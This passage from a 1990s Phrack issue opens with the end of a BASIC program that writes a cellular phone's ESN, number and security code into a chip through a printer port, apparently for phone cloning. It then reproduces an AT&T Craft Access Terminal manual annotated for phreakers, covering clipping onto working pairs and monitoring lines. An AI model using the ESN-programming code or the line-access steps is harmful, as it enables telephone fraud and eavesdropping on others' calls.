  5807. 1030 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 00-07
  5808. 1040 DATA xx,38,xx,xx,xx,xx,xx,xx ' Bytes 08-15
  5809. 1050 DATA 00,00,00,00,xx,xx,xx,xx ' Bytes 16-23
  5810. 1060 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 24-31
  5811. 1070 DATA xx,xx,xx,D6,C5,5C,C6,00 ' Bytes 32-39
  5812. 1080 DATA 27,00,01,01,11,11,11,11 ' Bytes 40-47
  5813. 1090 DATA 11,08,4D,01,0F,01,0F,00 ' Bytes 48-55
  5814. 1100 DATA 04,00,00,00,FF          ' Bytes 56-60
  5815. 1105 UNIT1$="050490"
  5816. 1110 DIM BYTE$(60),BYTE(61)
  5817. 1120 FOR I=0 TO 60:READ BYTE$(I):NEXT
  5818. 1130 FILES "*.IMG"
  5819. 1140 LINE INPUT "Which file do you want to read? ";F$
  5820. 1150 OPEN "I",#1,F$+".IMG"
  5821. 1160 INPUT#1,ESNPREFIX
  5822. 1170 INPUT#1,ESN#
  5823. 1180 INPUT#1,HOMEID
  5824. 1190 INPUT#1,ACCESS
  5825. 1200 INPUT#1,LOCALOPT
  5826. 1210 INPUT#1,PHONE$
  5827. 1220 INPUT#1,STATCLASS
  5828. 1230 INPUT#1,PGCH
  5829. 1240 INPUT#1,OVERLDCL
  5830. 1250 INPUT#1,PREFSYS
  5831. 1260 INPUT#1,GROUPID
  5832. 1270 INPUT#1,SEC$
  5833. 1280 ' Building binary image
  5834. 1290 UNIT2$=MID$(UNIT$,1,2)+MID$(UNIT$,4,2)+MID$(UNIT$,9,2)
  5835. 1300 CLOSE #1
  5836. 1310 FOR I=1 TO 5:BYTE$(I-1)="3"+MID$(SEC$,I,1):NEXT
  5837. 1320 FOR I=0 TO 2:BYTE$(10+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT1$,I*2+1,2))),2)
  5838. 1325 NEXT
  5839. 1330 FOR I=0 TO 2:BYTE$(13+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT2$,I*2+1,2))),2)
  5840. 1335 NEXT
  5841. 1340 FOR I=0 TO 4:BYTE$(24+I)=MID$(PHONE$,2*I+1,2):NEXT
  5842. 1350 FOR I=5 TO 0 STEP -1
  5843. 1360 Q=INT(ESN#/(16^I))
  5844. 1370 ESN#=ESN#-Q*(16^I)
  5845. 1380 IF Q>9 THEN Q=Q+7
  5846. 1390 ESN$=ESN$+CHR$(48+Q)
  5847. 1400 NEXT
  5848. 1410 BYTE$(8)=RIGHT$("0"+HEX$(ESNPREFIX),2)
  5849. 1420 BYTE$(5)=MID$(ESN$,5,2)
  5850. 1430 BYTE$(6)=MID$(ESN$,3,2)
  5851. 1440 BYTE$(7)=MID$(ESN$,1,2)
  5852. 1450 FOR I=0 TO 60:Q$=BYTE$(I)
  5853. 1460 QH=ASC(LEFT$(Q$,1))-48:IF QH>9 THEN QH=QH-7:IF QH>15 THEN QH=QH-32
  5854. 1470 QL=ASC(RIGHT$(Q$,1))-48:IF QL>9 THEN QL=QL-7:IF QL>15 THEN QL=QL-32
  5855. 1480 Q=QH*16+QL
  5856. 1490 BYTE(I)=Q:CHECK=CHECK+Q
  5857. 1500 NEXT
  5858. 1510 BYTE(20)=HOMEID AND 255:BYTE(21)=INT(HOMEID/256)
  5859. 1520 BYTE(22)=ACCESS
  5860. 1530 BYTE(23)=LOCALOPT
  5861. 1540 BYTE(29)=STATCLASS
  5862. 1550 BYTE(30)=PGCH AND 255:BYTE(31)=INT(PGCH/256)
  5863. 1560 BYTE(32)=OVERLDCL
  5864. 1570 BYTE(33)=PREFSYS
  5865. 1580 BYTE(34)=GROUPID
  5866. 1590 AC$=MID$(PHONE$,1,3)
  5867. 1600 PRE$=MID$(PHONE$,4,3)
  5868. 1610 PH$=MID$(PHONE$,7,4)
  5869. 1620 AC=VAL(AC$)
  5870. 1630 IF MID$(AC$,2,2)="00" THEN AC2=AC-1:GOTO 1670
  5871. 1640 IF MID$(AC$,3,1)="0" THEN AC2=AC-101:GOTO 1670
  5872. 1650 IF MID$(AC$,2,1)="0" THEN AC2=AC-11:GOTO 1670
  5873. 1660 AC2=AC-111
  5874. 1670 PRE=VAL(PRE$)
  5875. 1680 IF MID$(PRE$,2,2)="00" THEN PRE2=PRE-1:GOTO 1720
  5876. 1690 IF MID$(PRE$,2,1)="0" THEN PRE2=PRE-11:GOTO 1720
  5877. 1700 IF MID$(PRE$,3,1)="0" THEN PRE2=PRE-101:GOTO 1720
  5878. 1710 PRE2=PRE-111
  5879. 1720 IF PRE2<0 THEN PRE2=1000+PRE2
  5880. 1730 IF LEFT$(PH$,1)="0" THEN D=-24:GOTO 1750
  5881. 1740 D=87-24*(ASC(PH$)-49)
  5882. 1750 IF MID$(PH$,4,1)="0" THEN D=D-10
  5883. 1760 IF MID$(PH$,3,1)="0" THEN D=D-100
  5884. 1770 IF MID$(PH$,2,1)="0" THEN D=D-1000
  5885. 1780 IF MID$(PH$,1,1)="0" THEN D=D-10105
  5886. 1790 PH2=VAL(PH$)-D
  5887. 1800 C=INT(PRE2/4)
  5888. 1810 B=64*(PRE2 AND 3)
  5889. 1820 A=PH2 AND 255
  5890. 1830 B=B OR INT(PH2/256)
  5891. 1840 BYTE(35)=A
  5892. 1850 BYTE(36)=B
  5893. 1860 BYTE(37)=C
  5894. 1870 BYTE(38)=AC2 AND 255
  5895. 1880 BYTE(39)=INT(AC2/256)
  5896. 1890 CHECK=0
  5897. 1900 FOR I=0 TO 60
  5898. 1910 CHECK=CHECK+BYTE(I)
  5899. 1920 NEXT
  5900. 1930 BYTE(61)=CHECK AND 255
  5901. 1940 DEV$="1010":ADDR$="000"
  5902. 1945 ' Select the base address for your printer port with the next line.
  5903. 1950 BASE=&H378 ' Which is LPT2. &h378 is LPT1 and &h3bc is LPT3.
  5904. 1960 GOTO 2120
  5905. 1970 OUT BASE,(DOUT AND 1) OR 2*(CLK AND 1) OR 4*(RELAY)
  5906. 1980 FOR DELAY=0 TO 9:NEXT
  5907. 1990 DIN=INP(BASE) AND 1
  5908. 2000 RETURN
  5909. 2010 FOR I=1 TO LEN(B$)
  5910. 2020 B=ASC(MID$(B$,I,1))-48
  5911. 2030 DOUT=B:CLK=0:GOSUB 1970
  5912. 2040 DOUT=B:CLK=1:GOSUB 1970
  5913. 2050 DOUT=B:CLK=0:GOSUB 1970
  5914. 2060 NEXT
  5915. 2070 T=0
  5916. 2080 DOUT=1:CLK=1:GOSUB 1970
  5917. 2090 IF DIN=0 THEN RETURN
  5918. 2100 IF T=200 THEN BEEP:PRINT "Nack timeout error":STOP
  5919. 2105 ' Is voltage applied to the chip?
  5920. 2110 T=T+1:GOTO 2080
  5921. 2120 MAX=61:RELAY=1:DOUT=1:CLK=1:GOSUB 1970
  5922. 2130 T$=TIME$
  5923. 2140 IF T$=TIME$ GOTO 2140
  5924. 2150 FOR J=0 TO MAX
  5925. 2160 DOUT=1:CLK=1:GOSUB 1970 ' Start bit
  5926. 2170 IF DIN=0 THEN BEEP:PRINT "Bus not free error":STOP ' Bad!
  5927. 2180 DOUT=0:CLK=1:GOSUB 1970
  5928. 2190 DOUT=0:CLK=0:GOSUB 1970
  5929. 2200 B$=DEV$+ADDR$+"0"
  5930. 2210 GOSUB 2010
  5931. 2220 B$=""
  5932. 2230 FOR I=7 TO 0 STEP -1
  5933. 2240 IF (J AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
  5934. 2250 NEXT
  5935. 2260 GOSUB 2010
  5936. 2270 Z=BYTE(J)
  5937. 2280 B$="":FOR I=7 TO 0 STEP -1
  5938. 2290 IF (Z AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
  5939. 2300 NEXT
  5940. 2310 GOSUB 2010
  5941. 2320 DOUT=0:CLK=0:GOSUB 1970
  5942. 2330 DOUT=0:CLK=1:GOSUB 1970 ' Stop bit
  5943. 2340 DOUT=1:CLK=1:GOSUB 1970
  5944. 2350 PRINT USING "###% programmed";100*J/MAX
  5945. 2360 PRINT STRING$(80*J/MAX,46)
  5946. 2370 LOCATE CSRLIN-2,POS(0)
  5947. 2380 GOSUB 1970
  5948. 2390 IF DIN=0 GOTO 2380
  5949. 2400 NEXT
  5950. 2410 RELAY=0:DOUT=1:CLK=1:GOSUB 1970
  5951. 2420 PRINT:PRINT
  5952. 2430 'This is the end in case you though the code was truncated somehow...
  5953.  
  5954.  
  5955.                               ==Phrack Magazine==
  5956.  
  5957.                  Volume Seven, Issue Forty-Eight, File 8 of 18
  5958.  
  5959.  
  5960.     .:::::  :::::.  .::::.  .::::: ::::::
  5961.     ::      ::  ::  ::  ::  ::       ::                          
  5962.     ::      ::  ::  ::  ::  ::       ::                          
  5963.     ::      :::::'  ::::::  :::::    ::                          
  5964.     ::      :::::.  ::  ::  ::       ::
  5965.     `:::::  ::  ::  ::  ::  ::       ::
  5966.  
  5967.     .::::.  .:::::  .:::::  .:::::  .:::::  .:::::
  5968.     ::  ::  ::      ::      ::      ::      ::
  5969.     ::  ::  ::      ::      ::::    `::::.  `::::.
  5970.     ::::::  ::      ::      ::          ::      ::
  5971.     ::  ::  ::      ::      ::          ::      ::
  5972.     ::  ::  `:::::  `:::::  `:::::  :::::'  :::::'
  5973.  
  5974.     ::::::  .:::::  .::::.  .::::::.  ::  .:::: ::  .::::.  ::
  5975.       ::    ::      ::  ::  :: :: ::  ::  :: :: ::  ::  ::  ::
  5976.       ::    ::::    ::  ::  ::    ::  ::  :: :: ::  ::  ::  ::
  5977.       ::    ::      :::::'  ::    ::  ::  :: :: ::  ::::::  ::
  5978.       ::    ::      ::::.   ::    ::  ::  :: :: ::  ::  ::  ::
  5979.       ::    `:::::  ::  ::  ::    ::  ::  :: `::::  ::  ::  `::::
  5980.  
  5981. ------------------------------------------------------------------------------
  5982.  
  5983.                      Written by Boss Hogg
  5984.  
  5985. Greets: Voyager/Splatter/Mr.Hyde/Misfit/Darkseed/][avok/Paradyne
  5986.         Ethereal Gloom/Surgat/GOL/Carnage/Kamakize/Seeker/Stravis
  5987.         + all others with weird thoughts and ideas.
  5988.  
  5989.  
  5990.         The craft.
  5991.  
  5992.         Although its called a Craft Access Terminal, the craft hardly
  5993. represents a standard computer terminal. It is in actually a lineman's
  5994. handset with a built in terminal and 1200 baud modem. The unit looks
  5995. like a handset on steroids measuring 12.5" in length. The ones in our
  5996. particular area were bright yellow and looks like a rejected Sesame
  5997. Street prop. We have reports that they also made them in a blue color as
  5998. well though we have yet to see one in use in our area.
  5999.  
  6000.         The unit features a 4 line x 16 character LCD display, and a
  6001. joystick with a plunger on the top. You will find a diagram of the unit
  6002. with descriptions in brackets.
  6003.  
  6004.         These units are possibly being phased out in a few areas and
  6005. have been found at telco auctions as well as from surplus stores. They
  6006. could be replacing these yellow units with the blue units (Which have
  6007. the same basic descriptions yet are newer. The crafts we have found were
  6008. severely worn). We have also heard they were being replaced with a
  6009. Access-2 terminal (rumored to represent a HP-95lx palmtop; Fold open,
  6010. larger LCD screen).
  6011.  
  6012.         This is essentially the entire uncopywritten manual to the
  6013. terminal. The unit can be somewhat confusing at first due to a somewhat
  6014. weird menu layout.
  6015.  
  6016.  
  6017. Also, to avoid confusion:
  6018.  
  6019.  - The page numbers are located at the bottom of the pages. You may wish
  6020. to add pagefeeds and space out the page numbers to the bottom of the
  6021. page if you want to print it out and stick it in your phreakers binder
  6022. or whatever.... The line is meant for the top of each page... As there
  6023. is a line at the top in the real manual.
  6024.  
  6025.  
  6026. ----Here begins the Craft Access Terminal Instruction Manual----
  6027.  
  6028.  
  6029.  
  6030.  
  6031.  
  6032.  
  6033.                               AT&T
  6034.  
  6035.                        Craft Access Terminal
  6036.  
  6037.  
  6038.  
  6039.                         Instruction Manual
  6040.  
  6041.  
  6042.  
  6043.  
  6044.  
  6045.  
  6046.                              -cover-
  6047.  
  6048.  
  6049.         -----------------------------------------------------------
  6050.  
  6051.  
  6052.         Table of Contents
  6053.        
  6054.                                        Page
  6055.     
  6056.           Features                     : 2
  6057.           Using the pointer            : 4
  6058.           Battery Pack                 : 6
  6059.           Connecting to a working pair : 8
  6060.           Making a telephone call      : 9
  6061.           Calling a computer           : 12
  6062.           Working with a computer      : 15
  6063.           Getting help                 : 15
  6064.           Making or canceling a
  6065.            selection on a screen       : 17
  6066.           Reading stored information   : 19
  6067.           Filling in information       : 20
  6068.           Taking care of your terminal : 25
  6069.  
  6070.  
  6071.  
  6072.  
  6073.         -----------------------------------------------------------
  6074.  
  6075.  
  6076.         Getting Started
  6077.  
  6078.         Two battery packs, a charger and a short charger adaptor cord
  6079.         should be in the box with the Craft Access Terminal. Before
  6080.         using the Craft Access Terminal, insert a battery pack. The
  6081.         battery pack must be charged before use. For directions on how
  6082.         to charge and insert the battery pack, look at the section of
  6083.         the instructions called "The Craft Access Terminal's Battery
  6084.         Pack." This section begins on page 6.
  6085.  
  6086.  
  6087.  
  6088.  
  6089.                                       -1-
  6090.  
  6091.  
  6092.  
  6093.  
  6094.         -----------------------------------------------------------
  6095.  
  6096.  
  6097.         Craft Access Terminal Features
  6098.  
  6099.  
  6100.  
  6101.          Receiver - Works like any ordinary telephone receiver.
  6102.           [points to ear-piece]
  6103.  
  6104.          Transmitter - Works like an ordinary telephone transmitter.
  6105.           [points to mouthpiece]
  6106.  
  6107.          Craft Access Terminal - Identification Number
  6108.           [points to sticker underneath the TRANSMITTER]
  6109.  
  6110.          Phone Jack - A modular telephone cord can be plugged in here.
  6111.           [located on bottom of the handset]
  6112.  
  6113.          Recharger Jack - The plug on the recharger cord is inserted into
  6114.                           the jack.
  6115.           [located on bottom of the handset]
  6116.  
  6117.          Connecting Cord - Connects to a working pair to get dial tone for
  6118.                            making a call to either a telephone or a computer.
  6119.           [extends from bottom of handset]
  6120.  
  6121.  
  6122.                                       -2-
  6123.  
  6124.  
  6125.  
  6126.  
  6127.         -----------------------------------------------------------
  6128.  
  6129.  
  6130.  
  6131.           Screen - A liquid crystal display shows information
  6132.                    or instructions.
  6133.            [on top-front of handset. c'mon- you cant miss it!]
  6134.  
  6135.           Mode Switch
  6136.             Three positions:
  6137.                   Talk      -make a phone call
  6138.                   Monitor   -listen for conversation
  6139.                   Data      -make a computer call
  6140.           Moving the switch to monitor will disconnect a call.
  6141.            [This switch is located on the right-top side, when the ]
  6142.            [LCD screen is facing you                               ]
  6143.  
  6144.           Pointer - Used to mark and select actions on the screen and to
  6145.                     indicate where you want to enter information.
  6146.            [Joystick located under Screen]
  6147.  
  6148.           Rechargeable Battery Pack - Provides power for the terminal. The
  6149.                                       pack must be recharged every day.
  6150.  
  6151.         [This is accessed by removing a cover held in place by a normal ]
  6152.         [phillips screw. The compartment is located under the pointer.  ]
  6153.         [NOTE: Although there is a 9-volt battery snap, the thing only  ]
  6154.         [uses 4 1.2volt nicads... 4 AA batteries work fine... For those ]
  6155.         [whose sets didn't come with battery packs                      ]
  6156.  
  6157.           Alpha Numeric Keypad - Used to enter letters and numbers on the
  6158.                                 screen.
  6159.             [Uhh- A normal Touch Tone pad... Cant miss it ]
  6160.  
  6161.                                     
  6162.              
  6163.                                       -3-
  6164.  
  6165.  
  6166.  
  6167.  
  6168.         -----------------------------------------------------------
  6169.  
  6170.  
  6171.         Using the pointer
  6172.  
  6173.  
  6174.  
  6175.                            The pointer allows you to make choices from a
  6176.                            screen, show where you want to fill in information,
  6177.     B     BACK             read information that is temporarily stored for you
  6178.     A                      in the Craft Access Terminal, and get an
  6179.  H  C  <   ^   >  N  S     explanation about a screen.
  6180.  E  K  <  .-.  >  E  E
  6181.  L  S  <  `-'  >  X  N     Remember that you must push the pointer to 
  6182.  P  P  <   V   >  T  D     make a choice.
  6183.     C
  6184.     E    REVIEW            The pointer can be moved along the right side,
  6185.                            along the left side, to the top center and bottom
  6186.                            center position.
  6187. <,>,^,V
  6188.     = joystick direction
  6189.  
  6190. .-. =  Joystick
  6191. `-'    
  6192.  
  6193.                 1. If you want to select from two or more choices on the
  6194.                    screen, move the Pointer along the right side until
  6195.                    the arrow (>) appears next to the line you want to
  6196.                    select and then press the Pointer.
  6197.  
  6198.  
  6199.  
  6200.  
  6201.                                       -4-
  6202.  
  6203.  
  6204.  
  6205.  
  6206.         -----------------------------------------------------------
  6207.  
  6208.  
  6209.  
  6210.  
  6211.                 2. If you want additional information about one of the
  6212.                    choices on the screen, move the Pointer along the
  6213.                    left side until the question mark (?) appears next to
  6214.                    the line where you need HELP and then press the
  6215.                    Pointer.
  6216.  
  6217.  
  6218.                 3. If you want to go BACK one screen, move the Pointer
  6219.                    to the top center position and then press the
  6220.                    Pointer.
  6221.  
  6222.                 4. If you want to REVIEW information stored in your
  6223.                    Craft Access Terminal, move the Pointer to the bottom
  6224.                    center position and then press the Pointer.
  6225.  
  6226.                                       -5-
  6227.  
  6228.  
  6229.  
  6230.  
  6231.         -----------------------------------------------------------
  6232.  
  6233.  
  6234.         The Craft Access Terminal's Battery Pack
  6235.  
  6236.          You must charge the terminals battery pack at least once every
  6237.           day. It may take up to twelve hours for a full charge if the
  6238.           battery pack has run down completely. Also, before the first
  6239.           use, each battery pack should be charged for 24 hours.
  6240.  
  6241.          To do this, insert the plug at the other end of the cord
  6242.           attached to the charger into the socket at the transmitter end
  6243.           of the Craft Access Terminal. Plug the charger at the end of
  6244.           the cord into an electrical outlet. The red light on the
  6245.           charger should be lit if it is charging properly. However, the
  6246.           light will not go out if the battery is fully charged. It is
  6247.           advisable to keep the extra battery pack charged so you can
  6248.           use it if the battery pack in the terminal you're using runs
  6249.           down. To charge the spare battery pack, plug the charger
  6250.           adapter cord, (the short cord included with the charger) into
  6251.           the pack. Plug the other end of the adapter cord into the
  6252.           charger, and plug the charger into an electrical outlet.
  6253.  
  6254.          CAUTION
  6255.  
  6256.           The charger should only be used indoors and only for charging
  6257.           Craft Access Terminal.
  6258.  
  6259.          In the battery pack runs out of power while you are using the
  6260.           terminal, the pack can be removed and the charged pack can be
  6261.           inserted. To do this, follow these steps:
  6262.  
  6263.          1. Open the Battery Pack Compartment
  6264.                 Loosen the screw to open the battery cover. Do not hold
  6265.                 down battery compartment cover while loosening the
  6266.                 screw.
  6267.  
  6268.          2. Remove the Battery Pack
  6269.                 Lift out battery pack. Unsnap the battery pack from the
  6270.                 connector.
  6271.  
  6272.                                       -6-
  6273.  
  6274.  
  6275.  
  6276.  
  6277.         -----------------------------------------------------------
  6278.  
  6279.  
  6280.  
  6281.  
  6282.          3. Insert the Battery Pack
  6283.                 Snap the charged battery pack into the connector. 
  6284.         Slide the battery pack into the Craft Access Terminal.
  6285.                 Close the battery cover. Don't forget to tighten
  6286.                 the screw.
  6287.  
  6288.          How Long Will the Craft Access Terminal Stay Charged?
  6289.  
  6290.            At normal temperatures, the Craft Access Terminal will
  6291.            operate for approximately 12 hours after being charged.
  6292.  
  6293.          The Craft Access Terminal can be used in warm or cold
  6294.           temperatures. You should keep in mind however, that the
  6295.           battery pack will be drained faster in cold weather. At -20
  6296.           degrees Fahrenheit, it may last only 8-10 hours.
  6297.  
  6298.          The battery pack in the Craft Access Terminal should no be
  6299.           charged at temperatures less than 40 degrees Fahrenheit.
  6300.  
  6301.          Battery Pack Life
  6302.  
  6303.           The battery pack can be charged many times, providing a
  6304.           working life of about 5 years. The four digit number stamped
  6305.           on the end of the battery is its date of manufacture.
  6306.  
  6307.  
  6308.                                       -7-
  6309.  
  6310.  
  6311.  
  6312.  
  6313.         -----------------------------------------------------------
  6314.  
  6315.  
  6316.         Connecting to a Working Pair
  6317.  
  6318.  
  6319.          Monitor the Line
  6320.           Before connecting to a pair, set the switch at the Monitor
  6321.           (center) position.
  6322.  
  6323.          Connect Cord and Clips
  6324.           Attach cord clips to tip and ring. If you hear a conversation,
  6325.           select another pair. You should hear dial tone when connected
  6326.           to an available working pair.
  6327.  
  6328.        * Connect at a standard terminal point whenever possible to avoid
  6329.           puncturing the insulation; holes made in insulation by clips
  6330.           can lead to later corrosion problems
  6331.  
  6332.          Alternately, dial tone can also be obtained by inserting a
  6333.           modular cord as shown on page 2. Do not insert line cord to
  6334.           modular jack and connect to tip and ring at the same time. It
  6335.           will not work.
  6336.  
  6337.          Move back to monitor to increase or decrease volume. To
  6338.           increase the volume, move the Pointer along the right side
  6339.           until the arrow (>) in next to "increase volume" and then
  6340.           press the Pointer.
  6341.  
  6342.          To decrease the volume, point to the third line, and press.
  6343.  
  6344.          If you want to use the terminal to listen for noise on the
  6345.           line, point to the second line and press. This puts the
  6346.           terminal in the "quiet" mode so that very low levels of noise
  6347.           can be detected.
  6348.  
  6349.          Notice that the top line on this screen can't be selected. To
  6350.           indicate this, the first space on the line contains a bar.
  6351.           (I).
  6352.  
  6353.          You can now make an ordinary telephone call be moving the
  6354.           switch to Talk (see Making a Telephone Call) or call a
  6355.           computer by moving the switch to Data (see Calling a
  6356.           Computer).
  6357.  
  6358.  
  6359.                                       -8-
  6360.  
  6361.  
  6362.  
  6363.  
  6364.         -----------------------------------------------------------
  6365.  
  6366.  
  6367.         Making a Telephone Call
  6368.  
  6369.  
  6370.          Move the switch from Monitor to Talk Position
  6371.  
  6372.  
  6373.          Monitor the line to be sure it isn't in use. If no one is
  6374.           talking on the line, move the switch from Monitor to Talk.
  6375.  
  6376.          Telephone Number Entry and Correction
  6377.  
  6378.          If the line is good, you will hear a dial tone. You can enter
  6379.           the number you want to call through the keypad. If a number is
  6380.           already filled in, you can call that number, or, if you want
  6381.           to call a different number, erase the number that is on the
  6382.           screen by pressing * on the Touch-tone pad, and enter another
  6383.           number.
  6384.  
  6385.         * If the (*) is entered as the first character, it will not
  6386.           erase unless another (*) us entered.
  6387.  
  6388.          The small flashing bar is called the cursor. The cursor will
  6389.           appear where a number must be entered.
  6390.  
  6391.          As each digit to the telephone number is filled in, it will
  6392.           appear where the cursor was, and the cursor will move one
  6393.           space to the right. Enter a pound (#) between digits to
  6394.           indicate a 2-second pause in dialing where required (to wait
  6395.           for a second dial tone behind a PBX number, for example). For
  6396.           a longer pause, press pound (#) several times.
  6397.  
  6398.  
  6399.  
  6400.  
  6401.  
  6402.                                       -9-
  6403.  
  6404.  
  6405.  
  6406.  
  6407.         -----------------------------------------------------------
  6408.  
  6409.  
  6410.  
  6411.  
  6412.          When the correct phone number is shown, move the Pointer to the
  6413.           right side (anywhere along the right side will do) and press.
  6414.           If you need to rotary dial, select the last line with the
  6415.           Pointer before you press. The Craft Access Terminal will dial
  6416.           the number. You can re-dial by moving the Pointer to the right
  6417.           side and pressing again.
  6418.  
  6419.          The Craft Access Terminal will save the telephone number and it
  6420.           will appear the next time the switch is moved to the Talk
  6421.           position.
  6422.  
  6423.          You can listen as the Craft Access Terminal dials the number.
  6424.           If you hear a busy signal after dialing is completed, or if no
  6425.           one answers the call, disconnect by moving the switch to the
  6426.           Monitor position.
  6427.  
  6428.          Call in Progress and Volume Control
  6429.  
  6430.          When dialing is completed, this screen appears. Use the
  6431.           Pointer the increase or decrease the volume of the receiver,
  6432.           or to mute the trans mitter to listen only.
  6433.  
  6434.          The volume level is indicated by the number of filled spaces on
  6435.           the increase volume line. One filled space for minimum volume,
  6436.           four for maximum.
  6437.  
  6438.  
  6439.                                       -10-
  6440.  
  6441.  
  6442.  
  6443.  
  6444.         -----------------------------------------------------------
  6445.  
  6446.  
  6447.         Disconnecting
  6448.  
  6449.          Moving the switch to the Monitor position will end the phone
  6450.           call, and this screen will appear.
  6451.  
  6452.          Be sure to move the switch to the Monitor position after
  6453.           disconnecting. This will conserve battery power as the
  6454.           terminal drains the least amount of power in the monitor mode.
  6455.  
  6456.          If you are accidentally disconnected, move the switch to the
  6457.           Monitor position and start again.
  6458.  
  6459.  
  6460.  
  6461.  
  6462.                                       -11-
  6463.  
  6464.  
  6465.  
  6466.  
  6467.         -----------------------------------------------------------
  6468.  
  6469.  
  6470.         Calling the Craft Access System Computer
  6471.  
  6472.  
  6473.  
  6474.          Move the Switch from Monitor to Data Position.
  6475.  
  6476.           Monitor the line to be sure it isn't in use. If no one is
  6477.            talking on the line, move the switch from Monitor to Data.
  6478.  
  6479.          Telephone Number Entry and Correction
  6480.  
  6481.           You can enter the number you want to call through the keypad.
  6482.            If a number is already filled in, you can call that number,
  6483.            or, if you want to call a different number, erase the number
  6484.            on screen by pressing the asterisk (*) on the Touch-tone pad,
  6485.            and fill in another number.
  6486.  
  6487.           The cursor will appear where a number must be entered.
  6488.  
  6489.  
  6490.           Fill in the computer's telephone number if it isn't already
  6491.            shown. Put a pound (#) between digits to indicate a 2-second
  6492.            pause in dialing where required (to wait for a second dial
  6493.            tone behind a PBX number, for example). For a longer pause,
  6494.            press pound (#) several times.
  6495.  
  6496.  
  6497.  
  6498.                                       -12-
  6499.  
  6500.  
  6501.  
  6502.  
  6503.         -----------------------------------------------------------
  6504.  
  6505.  
  6506.  
  6507.  
  6508.           When the correct phone number is shown, move the Pointer to
  6509.            the right side (anywhere along the right side will do)and
  6510.            press. The Craft Access Terminal will dial the number. You
  6511.            can re-dial by moving the Pointer to the right side and
  6512.            pressing again.
  6513.  
  6514.  
  6515.  
  6516.          Indications that the Call is Successful
  6517.  
  6518.           If the call to the Craft Access System computer is successful,
  6519.            you will hear a tone on the line. When the Craft Access
  6520.            Terminal detects that tone, the tone will stop and a screen
  6521.            like this will appear.
  6522.  
  6523.           In some cases the call may not be successful. If you retry a
  6524.            few times and still have difficulty, try connecting your cord
  6525.            to another working pair.
  6526.  
  6527.  
  6528.          Password Entry
  6529.  
  6530.           Before you send or receive any computer information, you may
  6531.            need to fill in a numeric password to identify yourself and a
  6532.            number to identify your terminal. Your password can be used
  6533.            only with your Craft Access Terminal. Fill in your password
  6534.            on the keypad. If you make a mistake press the asterisk (*)
  6535.            to erase the password and start over. The cursor will return
  6536.            to the place where the password must be filled in.
  6537.  
  6538.           The Terminal Identification number is located below the
  6539.            transmitter (see page 2).
  6540.  
  6541.           When the correct numbers are filled in, move the Pointer to
  6542.            the right side (anywhere along the right side will do) and
  6543.            press. The Craft Access Terminal will send your password to
  6544.            the computer.
  6545.  
  6546.  
  6547.  
  6548.                                       -13-
  6549.  
  6550.  
  6551.  
  6552.  
  6553.         -----------------------------------------------------------
  6554.  
  6555.  
  6556.  
  6557.  
  6558.          See "Working with the Craft Access System Computer" for further
  6559.           instructions about what to do next.
  6560.  
  6561.  
  6562.         Disconnect
  6563.  
  6564.          If your call to a computer is accidentally dis connected, move
  6565.           the switch to the Monitor position and repeat from the first
  6566.           step to re-dial.
  6567.  
  6568.  
  6569.          If you want to disconnect, move the switch to Monitor and this
  6570.           screen will appear.
  6571.  
  6572.  
  6573.  
  6574.                                       -14-
  6575.  
  6576.  
  6577.  
  6578.  
  6579.         -----------------------------------------------------------
  6580.  
  6581.  
  6582.         Working with the Craft Access System Computer
  6583.  
  6584.  
  6585.  
  6586.          Each line on a screen is either:
  6587.  
  6588.           - information
  6589.  
  6590.           - a space in which information can be filled in
  6591.  
  6592.           - a choice that can be selected
  6593.  
  6594.  
  6595.          This screen is an example. Information can be read on the first
  6596.           line, a number is to be entered on the second line, and you
  6597.           can make a choice between the last two lines. Lines that don't
  6598.           contain selectable choices begin with a bar (I). Those that
  6599.           are selectable choices begin with a blank space.
  6600.  
  6601.  
  6602.                ----------------------
  6603.  
  6604.                Getting Help
  6605.  
  6606.          To get help about the third line of this screen, move the
  6607.           Pointer along the left side until a question mark appears
  6608.           beside the third line. When the question mark is beside the
  6609.           line, press the Pointer. The help that appears de scribes what
  6610.           will happen if you select choice 1.
  6611.  
  6612.          To get help about the second line of this screen, a line in
  6613.           which information can be filled in, move the Pointer along the
  6614.           left side until a question mark (?) appears in the space where
  6615.           information is to be filled in and then press.
  6616.  
  6617.  
  6618.  
  6619.                                       -15-
  6620.  
  6621.  
  6622.  
  6623.  
  6624.         -----------------------------------------------------------
  6625.  
  6626.  
  6627.          This is an example of an explanation. A bar (I) appears to the
  6628.           left of every line and there is a page number in the top right
  6629.           corner of the screen. This page is numbered 1/2, indicating
  6630.           that it is the first page of two pages of information. the
  6631.           second page will be numbered 2/2.
  6632.  
  6633.          To read the next page of Help, move the Pointer to the right
  6634.           side (anywhere along the right side will do) and press.
  6635.  
  6636.  
  6637.          If you want to re-read pages, point to REVIEW (move the Pointer
  6638.           to the bottom center position and press) to go back one page
  6639.           at a time.
  6640.  
  6641.          When you are ready to go back to the screen where you
  6642.           originally requested help, point to BACK (move the Pointer to
  6643.           the top center and press).
  6644.  
  6645.  
  6646.  
  6647.                                       -16-
  6648.  
  6649.  
  6650.  
  6651.  
  6652.         -----------------------------------------------------------
  6653.  
  6654.  
  6655.         Making or Canceling a Selection on a Screen
  6656.  
  6657.  
  6658.  
  6659.  
  6660.          Making a Selection
  6661.  
  6662.           When a screen that contains selectable choices is shown, move
  6663.            the Pointer along the right side until the arrow (>) is
  6664.            beside the choice you want. Then press the Pointer to make
  6665.            the selection.
  6666.  
  6667.          Some choices make requests of a computer that may take a while.
  6668.           If so, a "request in progress" message such as this will
  6669.           appear.
  6670.  
  6671.  
  6672.  
  6673.  
  6674.  
  6675.                                       -17-
  6676.  
  6677.  
  6678.  
  6679.  
  6680.         -----------------------------------------------------------
  6681.  
  6682.  
  6683.         Canceling a Selection
  6684.  
  6685.  
  6686.          If at this point you realize that you've made a wrong choice,
  6687.           point to BACK (move the Pointer to the top center and press).
  6688.           The screen on which you made the choice will be shown and you
  6689.           can make a different choice.
  6690.  
  6691.          Some requests cannot be canceled. In this case, only "request
  6692.           in progress" is displayed.
  6693.  
  6694.  
  6695.  
  6696.  
  6697.  
  6698.  
  6699.  
  6700.                                       -18-
  6701.  
  6702.  
  6703.  
  6704.  
  6705.         -----------------------------------------------------------
  6706.  
  6707.  
